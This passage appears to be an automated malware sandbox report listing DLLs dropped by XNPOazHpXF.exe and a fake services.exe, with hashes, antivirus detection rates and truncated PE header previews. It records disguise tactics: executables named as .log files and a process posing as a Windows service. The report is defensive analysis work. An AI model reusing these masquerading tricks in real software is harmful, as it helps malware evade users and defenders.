                                                              SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                              SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\JedTEJPv.log

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):70144
                                                              Entropy (8bit):5.909536568846014
                                                              Encrypted:false
                                                              SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                              MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                              SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                              SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                              SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\KnJCpqCi.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):28160
                                                              Entropy (8bit):5.570953308352568
                                                              Encrypted:false
                                                              SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                              MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                              SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                              SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                              SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\LozUEcuw.log

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):33792
                                                              Entropy (8bit):5.541771649974822
                                                              Encrypted:false
                                                              SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                              MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                              SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                              SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                              SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 38%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\MYoSwDMa.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):69632
                                                              Entropy (8bit):5.932541123129161
                                                              Encrypted:false
                                                              SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                              MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                              SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                              SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                              SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 50%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                              C:\Users\user\Desktop\McDcppqu.log

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):36352
                                                              Entropy (8bit):5.668291349855899
                                                              Encrypted:false
                                                              SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                              MD5:94DA5073CCC14DCF4766DF6781485937
                                                              SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                              SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                              SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 21%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\MpvkKZGd.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):342528
                                                              Entropy (8bit):6.170134230759619
                                                              Encrypted:false
                                                              SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                              MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                              SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                              SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                              SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 50%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\PWGsgpUk.log

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):294912
                                                              Entropy (8bit):6.010605469502259
                                                              Encrypted:false
                                                              SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                              MD5:00574FB20124EAFD40DC945EC86CA59C
                                                              SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                              SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                              SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                              C:\Users\user\Desktop\QKKBSDQi.log

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):41472
                                                              Entropy (8bit):5.6808219961645605
                                                              Encrypted:false
                                                              SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                              MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                              SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                              SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                              SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 17%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\QOfJDANU.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):32256
                                                              Entropy (8bit):5.631194486392901
                                                              Encrypted:false
                                                              SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                              MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                              SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                              SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                              SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 25%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\QgmbSWHW.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):46592
                                                              Entropy (8bit):5.870612048031897
                                                              Encrypted:false
                                                              SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                              MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                              SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                              SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                              SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\RdNjnWVR.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):33792
                                                              Entropy (8bit):5.541771649974822
                                                              Encrypted:false
                                                              SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                              MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                              SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                              SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                              SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 38%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\SRRrZjRP.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):23552
                                                              Entropy (8bit):5.529329139831718
                                                              Encrypted:false
                                                              SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                              MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                              SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                              SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                              SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\SVgCSVvi.log

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):24064
                                                              Entropy (8bit):5.492504448438552
                                                              Encrypted:false
                                                              SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                              MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                              SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                              SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                              SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 33%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\TEZjEzBg.log

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):40448
                                                              Entropy (8bit):5.7028690200758465
                                                              Encrypted:false
                                                              SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                              MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                              SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                              SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                              SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 12%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\TuCjUNij.log

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):126976
                                                              Entropy (8bit):6.057993947082715
                                                              Encrypted:false
                                                              SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                              MD5:16B480082780CC1D8C23FB05468F64E7
                                                              SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                              SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                              SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 21%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                              C:\Users\user\Desktop\UbnsZBxQ.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):32768
                                                              Entropy (8bit):5.645950918301459
                                                              Encrypted:false
                                                              SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                              MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                              SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                              SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                              SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\WLWsZSvc.log

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):22016
                                                              Entropy (8bit):5.41854385721431
                                                              Encrypted:false
                                                              SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                              MD5:BBDE7073BAAC996447F749992D65FFBA
                                                              SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                              SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                              SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\XMTJgPHI.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):40448
                                                              Entropy (8bit):5.7028690200758465
                                                              Encrypted:false
                                                              SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                              MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                              SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                              SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                              SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 12%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\YwCJgfGU.log

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):38400
                                                              Entropy (8bit):5.699005826018714
                                                              Encrypted:false
                                                              SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                              MD5:87765D141228784AE91334BAE25AD743
                                                              SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                              SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                              SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 25%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                              C:\Users\user\Desktop\cEzSCxAQ.log

                                                              Download File
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):34816
                                                              Entropy (8bit):5.636032516496583
                                                              Encrypted:false
                                                              SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                              MD5:996BD447A16F0A20F238A611484AFE86
                                                              SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                              SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                              SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 21%
